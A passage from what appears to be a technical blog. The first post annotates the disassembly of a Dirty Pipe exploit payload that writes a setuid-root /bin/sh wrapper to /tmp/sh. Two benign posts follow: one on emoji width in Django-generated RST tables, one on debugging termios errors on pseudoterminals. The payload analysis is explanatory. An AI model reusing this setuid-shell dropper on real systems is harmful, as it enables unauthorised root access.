    /usr/include/asm-generic/fcntl.h
#define O_WRONLY  00000001
#define O_CREAT   00000100  /* not fcntl */
#define O_TRUNC   00001000  /* not fcntl */

$ grep -E '^#define __NR_.* (1|2|3|59|60|90|105|106)$' \
    /usr/include/x86_64-linux-gnu/asm/unistd_64.h
#define __NR_write 1
#define __NR_open 2
#define __NR_close 3
#define __NR_execve 59
#define __NR_exit 60
#define __NR_chmod 90
#define __NR_setuid 105
#define __NR_setgid 106

Remembering the calling conventions, we know:

the first 6 arguments to functions are stored in %rdi, %rsi, %rdx, %rcx, %r8, %r9;
the return value is stored in %rax (and for large values also %rdx);
the syscall number is stored in %rax.

After adding some annotations, the objdump output looks like this:

0000000000000078 <.data+0x78>:
  78: 48 8d 3d 56 00 00 00  lea    0x56(%rip),%rdi  # "/tmp/sh" at 0x7f+0x56=0xd5
  7f: 48 c7 c6 41 02 00 00  mov    $0x241,%rsi      # O_WRONLY(0x1) | O_CREAT(0x40) | O_TRUNC(0x200)
  86: 48 c7 c0 02 00 00 00  mov    $0x2,%rax        # __NR_open
  8d: 0f 05                 syscall                 # // open("/tmp/sh", 0x241)
  8f: 48 89 c7              mov    %rax,%rdi        # use return value (fd) as argument 1
  92: 48 8d 35 44 00 00 00  lea    0x44(%rip),%rsi  # "\x7fELF..." at 0x99+0x44=0xdd
  99: 48 c7 c2 ba 00 00 00  mov    $0xba,%rdx       # inner_elfcode_len (0xba)
  a0: 48 c7 c0 01 00 00 00  mov    $0x1,%rax        # __NR_write
  a7: 0f 05                 syscall                 # // write(fd, inner_elfcode, inner_elfcode_len)
  a9: 48 c7 c0 03 00 00 00  mov    $0x3,%rax        # __NR_close
  b0: 0f 05                 syscall                 # // close(fd)  // arg1 was reused
  b2: 48 8d 3d 1c 00 00 00  lea    0x1c(%rip),%rdi  # "/tmp/sh" at 0xb9+0x1c=0xd5
  b9: 48 c7 c6 ed 09 00 00  mov    $0x9ed,%rsi      # 0o4755
  c0: 48 c7 c0 5a 00 00 00  mov    $0x5a,%rax       # __NR_chmod
  c7: 0f 05                 syscall                 # // chmod("/tmp/sh", 04755)
  c9: 48 31 ff              xor    %rdi,%rdi        # 0
  cc: 48 c7 c0 3c 00 00 00  mov    $0x3c,%rax       # __NR_exit
  d3: 0f 05                 syscall                 # // exit(0)
  d5: 2f 74 6d 70 2f 73 68 00                       # "/tmp/sh\0"

We can examine the inner (Matryoshka) ELF as well, which is at 0xdd:

$ dd bs=1 if=dirtypipez-matryoshka.elf \
    skip=$((0xdd)) of=dirtypipez-inner.elf

readelf(1) shows that the inner ELF also starts at 0x78. We can read it from the outer elfcode directly:

$ objdump -D -m i386:x86-64 -b binary \
    --start-address=$((0xdd + 0x78)) \
    dirtypipez-matryoshka.elf
...

The only data there starts at 0x18f:

$ dd bs=1 if=dirtypipez-matryoshka.elf \
    skip=$((0x18f)) 2>/dev/null | hd
00000000  2f 62 69 6e 2f 73 68 00   |/bin/sh.|

I'll leave parsing of the assembly to the interested reader. But it checks out.

Likely, one could make the ELF even smaller by abusing the headers, but that wasn't the exercise. Although it could be a fun one.

2022-02-28 - rst tables with htmldjango / emoji two columns wide

For a project, we're using Django to generate a textual report. For readability, it is in monospace text. And we've done it in reStructuredText (RST) so we can generate an HTML document from it as well.

A table in RST might look like this:

+-----------+-------+
| car brand | users |
+===========+=======+
| Peugeot   |     2 |
+-----------+-------+
| Saab      |     1 |
+-----------+-------+
| Volvo     |     4 |
+-----------+-------+

Transforming this to HTML with a rst2html(1) generates a table similar to this:

<table class="docutils" border="1">
  <colgroup><col width="61%"><col width="39%"></colgroup>
  <thead valign="bottom">
    <tr><th class="head">car brand</th><th class="head">users</th></tr>
  </thead>
  <tbody valign="top">
    <tr><td>Peugeot</td><td>2</td></tr>
    <tr><td>Saab</td><td>1</td></tr>
    <tr><td>Volvo</td><td>4</td></tr>
  </tbody>
</table>

We can generate such a simple RST table using the Django template engine. Let the following Python list be the input:

cars = [('Peugeot', 2), ('Saab', 1), ('Volvo', 4)]

And as Django template, we'll use this:

+-----------+-------+
| car brand | users |
+===========+=======+
{% for car in cars %}| {{ car.0|ljust:9 }} | {{ car.1|rjust:5 }} |
+-----------+-------+
{% endfor %}

Sidenote, when generating text instead of html, we'd normally start the Django template with {% autoescape off %}. Elided here for clarity.

Working example

Here's a working Python3 snippet, including a setup() hack so we can skip Django setup that would just clutter this example:

# Quick and dirty Django setup; tested with Django 2.1
import django.conf
django.conf.settings.configure(
    DEBUG=True, TEMPLATES=[{
        'BACKEND': 'django.template.backends.django.DjangoTemplates'}])
django.setup()

# Setting up the content
cars = [('Peugeot', 2), ('Saab', 1), ('Volvo', 4)]

TEMPLATE = '''\
+-----------+-------+
| car brand | users |
+===========+=======+
{% for car in cars %}| {{ car.0|ljust:9 }} | {{ car.1|rjust:5 }} |
+-----------+-------+
{% endfor %}'''

# Rendering the table
from django.template import Context, Template
tpl = Template(TEMPLATE)
context = Context({'cars': cars})
print(tpl.render(context), end='')

But now, let's say we wanted to add some emoji's. Like a 🏆 :trophy: to the highest number. Because, in a big list, having some color can be tremendously useful to direct attention to where it's due.

We'll replace the numbers with strings, optionally including an emoji:

cars = [('Peugeot', '2'), ('Saab', '1'), ('Volvo', '\U0001F3C6 4')]

Rerun, and we get this:

+-----------+-------+
| car brand | users |
+===========+=======+
| Peugeot   |     2 |
+-----------+-------+
| Saab      |     1 |
+-----------+-------+
| Volvo     |   🏆 4 |
+-----------+-------+

Interesting... that one trophy character is taking up room for two.

You might be thinking that is just the display. But rst2html(1) agrees that this is wrong:

$ python3 cars.py | rst2html - cars.html
cars.rst:1: (ERROR/3) Malformed table.

So, what is the cause of this?

Emoji have East Asian width

On the Unicode section of the halfwidth and fullwidth forms page on Wikipedia we can read the following:

Unicode assigns every code point an "East Asian width" property.

[... W for naturally wide characters e.g. Japanese Hiragana ...
... Na for naturally narrow characters, e.g. ISO Basic Latin ...]

Terminal emulators can use this property to decide whether a character should consume one or two "columns" when figuring out tabs and cursor position.

And in the Unicode 12 standard, Annex #11 it reads:

In modern practice, most alphabetic characters are rendered by variable-width fonts using narrow characters, even if their encoding in common legacy sets uses multiple bytes. In contrast, emoji characters were first developed through the use of extensions of legacy East Asian encodings, such as Shift-JIS, and in such a context they were treated as wide characters. While these extensions have been added to Unicode or mapped to standardized variation sequences, their treatment as wide characters has been retained, and extended for consistency with emoji characters that lack a legacy encoding.

In short:

characters can be narrow or wide (with some exceptions);
emoji evolved from East Asian encodings;
emoji are wide, in constrast to "normal" European characters.

Solving the justification

With that knowledge, we now know why the table is wrongly dimensioned around the emoji. The rjust counts three characters and adds 2 spaces. But it should count four columns (one wide emoji, a (narrow) space and a (narrow) digit).

Luckily the Python Standard Library has the necessary prerequisites. We add this function:

from unicodedata import east_asian_width

def column_width(s):
    """Return total column width of the string s, taking into account
    that some unicode characters take up two columns."""
    return sum(column_width.widths[east_asian_width(ch)] for ch in s)
column_width.widths = {'Na': 1, 'H': 1, 'F': 2, 'W': 2, 'N': 2, 'A': 1}

While len('\U0001F3C6 4') returns 3, column_width('\U0001F3C6 4') returns 4.

All we have to do is create a new filter and apply it:

# By re-using the register from defaultfilters, we're adding it into
# the builtin defaults.
from django.template.defaultfilters import register, stringfilter

@register.filter(is_safe=True)
@stringfilter
def unicode_rjust(value, arg):
    return value.rjust(int(arg) - (column_width(value) - len(value)))

Use the new unicode_just filter:

TEMPLATE = '''\
+-----------+-------+
| car brand | users |
+===========+=======+
{% for car in cars %}| {{ car.0|ljust:9 }} | {{ car.1|unicode_rjust:5 }} |
+-----------+-------+
{% endfor %}'''

Result:

+-----------+-------+
| car brand | users |
+===========+=======+
| Peugeot   |     2 |
+-----------+-------+
| Saab      |     1 |
+-----------+-------+
| Volvo     |  🏆 4 |
+-----------+-------+

It looks good and rst2html is now also happy to convert.

[table using rjust versus unicode_rjust]

2022-01-22 - curious termios error / switching to asyncio serial

My Python code that interfaces with a serial port stopped working when refactoring the code to use asyncio. It started raising Invalid argument exceptions from tcsetattr(3). Why would asynchronous Python misbehave? Was there a bug in serial_asyncio?

TL;DR: When interfacing with an openpty(3) pseudoterminal — which I used to emulate a real serial port — setting parity and bytesize is not supported. But an error would only show up when tcsetattr(3) was called twice, which happened only in the asyncio case.

I was working on some Python code to communicate with an IEC62056-21 device over a serial bus. I planned on using the UART of a Raspberry PI for this purpose.

The basics involve opening a serial.Serial('/dev/ttyACM0', baudrate) Python serial object, reading from it and writing to it. But, for serial communication, there is more than just the baud rate which needs to be agreed upon. For this IEC62056-21 device, it is:

baud rate 300 (initially),
1 start bit (common default),
7 bits per byte (only 7 bits ASCII is spoken),
1 even parity bit (making sure all eight bits add up to a zero),
1 stop bit (common default).

The Python serial object supports all that:

ser = serial.Serial(
    '/dev/ttyACM0', baudrate=300,
    parity=serial.PARITY_EVEN,
    bytesize=7)

That should work, and it does. But...

Testing serial code using an openpty pair

Developing against the real device is awkward and fragile. So, instead of developing against the hardware device directly, I decided it was worth the effort to emulate the IEC62056-21 device, a fake server if you will.

For this purpose, I needed a bridge between two serial devices. This can be done using socat:

$ socat -dd pty,rawer,link=server.dev pty,rawer,link=client.dev
2022/01/22 12:59:34 socat[700243] N PTY is /dev/pts/28
2022/01/22 12:59:34 socat[700243] N PTY is /dev/pts/29
2022/01/22 12:59:34 socat[700243] N starting data transfer loop with FDs [5,5] and [7,7]

socat spawns a bridge between two openpty(3) created pseudoterminals and creates two symlinks for easy access:

$ readlink client.dev server.dev
/dev/pts/29
/dev/pts/28

We can now connect our fake server to one end, and the client we're developing to the other.

(In my case, I'm using a custom serialproxy.py that does what socat does, and more, because it also simulates baud rate slowness and checks speed compatibility, relevant because the IEC62056-21 protocol uses negotiable/changing transfer rates.)

A simple test script connecting to both the server and client end might look as follows:

# For this example, run the following in
# another terminal (in the same directory):
# $ socat -dd pty,rawer,link=server.dev pty,rawer,link=client.dev
# WARNING: Restart this socat to reset bridge state.

import serial
import time

SERIAL_OPTIONS = {
    'baudrate': 300,
    'parity': serial.PARITY_EVEN,
    'bytesize': 7,
    'stopbits': 1,
}

def main_serial(write_dev, read_dev):
    reader = serial.Serial(
        read_dev, **SERIAL_OPTIONS)
    #reader.timeout = 0
    writer = serial.Serial(
        write_dev, **SERIAL_OPTIONS)

    messages = [
        b'foo\n', b'bar\n', b'baz\n']
    for msg in messages:
        writer.write(msg)
        print('send', msg)
        out = reader.read(4)
        print('recv', out)
        assert msg == out, (msg, out)
        time.sleep(1)

main_serial('server.dev', 'client.dev')

This example prints:

send b'foo\n'
recv b'foo\n'
send b'bar\n'
recv b'bar\n'
send b'baz\n'
recv b'baz\n'

That's nice. We can use serial.Serial() without requiring a hardware UART during development.

(However, if you run the same script again without restarting socat, you'll be greeted with an Invalid argument exception. We'll see why in a bit. Restarting socat resets the bridge state and makes the script work again.)

Testing asyncio serial code using an openpty pair

Because it is 2022, and I don't want to use threads in Python (they're a poor combo), and I wanted to be able to run multiple subsystems at once, I decided to convert this script to use Python Asynchronous I/O.

Surely converting this script to asyncio is easy:

# For this example, run the following in
# another terminal (in the same directory):
# $ socat -dd pty,rawer,link=server.dev pty,rawer,link=client.dev
# WARNING: Restart this socat to reset bridge state.

import asyncio
import serial
from serial_asyncio import open_serial_connection

SERIAL_OPTIONS = {
    'baudrate': 300,
    'parity': serial.PARITY_EVEN,
    'bytesize': 7,
    'stopbits': 1,
}

def main_aioserial(write_dev, read_dev):
    loop = asyncio.get_event_loop()
    main_coro = aioserial(write_dev, read_dev)
    loop.run_until_complete(main_coro)
    loop.close()

async def aioserial(write_dev, read_dev):
    async def send(ser, msgs):
        for msg in msgs:
            ser.write(msg)
            print('send (asyncio)', msg)
            await asyncio.sleep(1)

    async def recv(ser):
        for i in range(3):
            out = await ser.readuntil(b'\n')
            print('recv (asyncio)', out)

    reader, _ = await open_serial_connection(
        url=read_dev, **SERIAL_OPTIONS)
    _, writer = await open_serial_connection(
        url=write_dev, **SERIAL_OPTIONS)

    messages = [b'foo\n', b'bar\n', b'baz\n']
    send_coro = send(writer, messages)
    recv_coro = recv(reader)
    await asyncio.wait({
        asyncio.create_task(coro)
        for coro in (send_coro, recv_coro)})

main_aioserial('server.dev', 'client.dev')

This should print the following:

send (asyncio) b'foo\n'
recv (asyncio) b'foo\n'
send (asyncio) b'bar\n'
recv (asyncio) b'bar\n'
send (asyncio) b'baz\n'
recv (asyncio) b'baz\n'

But instead, it prints:

Traceback (most recent call last):
  File "test_aioserial.py", line 45, in <module>
    main_aioserial('server.dev', 'client.dev')
  File "test_aioserial.py", line 20, in main_aioserial
    loop.run_until_complete(coro)
  File "asyncio/base_events.py", line 616, in run_until_complete
    return future.result()
  File "test_aioserial.py", line 35, in aioserial
    reader, _ = await open_serial_connection(
  File "serial_asyncio/__init__.py", line 438, in open_serial_connection
    transport, _ = yield from create_serial_connection(
  File "asyncio/coroutines.py", line 124, in coro
    res = func(*args, **kw)
  File "serial_asyncio/__init__.py", line 412, in create_serial_connection
    transport = SerialTransport(loop, protocol, ser)
  File "serial_asyncio/__init__.py", line 63, in __init__
    self._serial.timeout = 0
  File "serial/serialutil.py", line 368, in timeout
    self._reconfigure_port()
  File "serial/serialposix.py", line 435, in _reconfigure_port
    termios.tcsetattr(
termios.error: (22, 'Invalid argument')

This had me stumped for quite some time. Why would serial_asyncio misbehave?

Debugging Python tcsetattr

I decided to add some tracing code in /usr/lib/python3/dist-packages/serial/serialposix.py:

...
        # activate settings
        if force_update or [iflag, oflag, cflag, lflag, ispeed, ospeed, cc] != orig_attr:
            # vvv-- one line of code added --vvv
            import os; os.write(2, b'DEBUG serialposix.py tcsetattr() 0o%o\n' % (cflag,))
            termios.tcsetattr(
                self.fd,
                termios.TCSANOW,
                [iflag, oflag, cflag, lflag, ispeed, ospeed, cc])
...

Running the synchronous code snippet now showed:

$ python3 test_serial.py
DEBUG serialposix.py tcsetattr() 0o4657
DEBUG serialposix.py tcsetattr() 0o4657
send b'foo\n'
...

That is, two calls because of the two Serial objects being set up.

The output of the asynchronous version was now:

$ python3 test_aioserial.py
DEBUG serialposix.py tcsetattr() 0o4657
DEBUG serialposix.py tcsetattr() 0o4647
Traceback (most recent call last):
...
termios.error: (22, 'Invalid argument')

Here, the second call to tcsetattr(3) is done when setting the timeout to 0 (to make it "non-blocking"). It's still setting up the first of the two Serial objects.

If we look at the first example, we can enable the reader.timeout = 0 line and notice how the synchronous version now also chokes immediately.

So, it's not a serial_asyncio problem. But it is still a problem.

An strace then? Calling strace will show us which system calls are being executed. Maybe insight in their failure can shed some light on this. After all, the tcsetattr(3) library call will get translated to one or more system calls:

$ strace -s 2048 python3 test_serial.py 2>&1 |
  grep -A15 'write(.*DEBUG serialposix'

We know the call comes right after our write(2).

write(2, "DEBUG serialposix.py tcsetattr() 0o4657\n", 40DEBUG serialposix.py tcsetattr() 0o4657
) = 40

There it is. And then immediately some ioctl(2) calls.

ioctl(3, TCGETS, {B38400 opost isig icanon echo ...}) = 0
ioctl(3, TCGETS, {B38400 opost isig icanon echo ...}) = 0
ioctl(3, SNDCTL_TMR_START or TCSETS, {B300 -opost -isig -icanon -echo ...}) = 0
ioctl(3, TCGETS, {B300 -opost -isig -icanon -echo ...}) = 0
ioctl(3, TIOCMBIS, [TIOCM_DTR])         = -1 ENOTTY (Inappropriate ioctl for device)
ioctl(3, TCFLSH, TCIFLUSH)              = 0

There was one error, but this is during the first call, so it is ignored. (I can tell you now that those first four ioctl calls are all caused by a single Python termios.tcsetattr() call.)

pipe2([4, 5], O_CLOEXEC)                = 0
pipe2([6, 7], O_CLOEXEC)                = 0
fcntl(4, F_SETFL, O_RDONLY|O_NONBLOCK)  = 0
fcntl(6, F_SETFL, O_RDONLY|O_NONBLOCK)  = 0
ioctl(3, TCGETS, {B300 -opost -isig -icanon -echo ...}) = 0

Some other code was called, and then, the second call to tcsetattr(3):

write(2, "DEBUG serialposix.py tcsetattr() 0o4647\n", 40DEBUG serialposix.py tcsetattr() 0o4647
) = 40

ioctl(3, TCGETS, {B300 -opost -isig -icanon -echo ...}) = 0
ioctl(3, TCGETS, {B300 -opost -isig -icanon -echo ...}) = 0
ioctl(3, SNDCTL_TMR_START or TCSETS, {B300 -opost -isig -icanon -echo ...}) = 0
ioctl(3, TCGETS, {B300 -opost -isig -icanon -echo ...}) = 0

And after this point in the trace, Python starts collecting values to show a backtrace.

Now that is unexpected. The last system call returned 0 (SUCCESS), yet Python considered it failed and reports "Invalid argument".

I'm certain Python is not making that up, so there must be some other explanation.

Checking the library sources

The CPython library tcsetattr function looks like:

static PyObject *
termios_tcsetattr_impl(PyObject *module, int fd, int when, PyObject *term)
...
    if (cfsetispeed(&mode, (speed_t) ispeed) == -1)
        return PyErr_SetFromErrno(state->TermiosError);
    if (cfsetospeed(&mode, (speed_t) ospeed) == -1)
        return PyErr_SetFromErrno(state->TermiosError);
    if (tcsetattr(fd, when, &mode) == -1)
        return PyErr_SetFromErrno(state->TermiosError);
...

Pretty straight forward.

The CPython function calls the GNU glibc tcsettatr library function, which looks like:

int
__tcsetattr (int fd, int optional_actions, const struct termios *termios_p)
...
  return INLINE_SYSCALL (ioctl, 3, fd, cmd, &k_termios);
}

One syscall. Only one! But why is Python turning this into an exception then?

The answer turned out to be in local-tcsetaddr.diff — a distro-specific patch deployed on Debian/Linux distributions and derivatives (like Ubuntu):

# All lines beginning with `# DP:' are a description of the patch.
# DP: Description: tcsetattr sanity check on PARENB/CREAD/CSIZE for ptys
# DP: Related bugs: 218131.
...
--- a/sysdeps/unix/sysv/linux/tcsetattr.c
+++ b/sysdeps/unix/sysv/linux/tcsetattr.c
@@ -75,7 +80,55 @@
   memcpy (&k_termios.c_cc[0], &termios_p->c_cc[0],
    __KERNEL_NCCS * sizeof (cc_t));

-  return INLINE_SYSCALL (ioctl, 3, fd, cmd, &k_termios);
+  retval = INLINE_SYSCALL (ioctl, 3, fd, cmd, &k_termios);
+
+  /* The Linux kernel silently ignores the invalid c_cflag on pty.
+     We have to check it here, and return an error.  But if some other
+     setting was successfully changed, POSIX requires us to report
+     success. */
...
+   /* It looks like the Linux kernel silently changed the
+      PARENB/CREAD/CSIZE bits in c_cflag. Report it as an
+      error. */
+   __set_errno (EINVAL);
+   retval = -1;
+ }
+    }
+   return retval;
 }

According to that patch, the relevant debian bug report 218131, and other relevant communication, setting invalid/unsupported c_flags on a pseudoterminal (pty) should return EINVAL. Linux apparently just ignores the bad c_flags.

POSIX tcsetattr needs to handle three conditions correctly:

If all changes are successful, return success (0).

If some changes are successful and some aren't, return success.

If no changes are successful, return error (-1, errno=EINVAL).

The problem occurs when setting certain flags (PARENB, CREAD, or one of the CSIZE parameters) on a pty. The kernel silently ignores those settings, so libc is responsible for doing the right thing.

And indeed, if we remove the PARENB (enable even parity) and CS7 (7 bit CSIZE), the Invalid argument error goes away:

SERIAL_OPTIONS = {
    'baudrate': 300,
    #DISABLED# 'parity': serial.PARITY_EVEN,
    #DISABLED# 'bytesize': 7,
    'stopbits': 1,
}

$ python3 test_serial.py
DEBUG serialposix.py tcsetattr() 0o4267
DEBUG serialposix.py tcsetattr() 0o4277
send b'foo\n'
...

And now we can run the script consecutive times without restarting socat.

Setting parity or bytesize on a pseudoterminal is a big no

Apparently, pseudoterminals, as opened by openpty(3), do not grok setting different parity or bytesize. This was silently ignored by the tcsetattr(3) library call, as long as something else was altered at the same time.

Setting the baud rate works fine, it is propagated across to the slave pty. But while testing we'll need to avoid setting unsupported parity or bytesize.

After figuring all that out, going back to the manpage of tcsetattr(3) revealed this:

RETURN VALUE
  Note that tcsetattr() returns success
  if any of the requested changes could
  be successfully carried out. Therefore,
  when making multiple changes it may be
  necessary to follow this call with a
  further call to tcgetattr() to check
  that all changes have been performed
  successfully.

So, Python might be setting multiple values at once. And, maybe, just maybe, Python should then always call tcsetattr(3) twice, like the manpage suggests. That would cause consistent behaviour. And that would've saved me hours of debugging as I would've identified the custom SERIAL_OPTIONS as culprits so much sooner.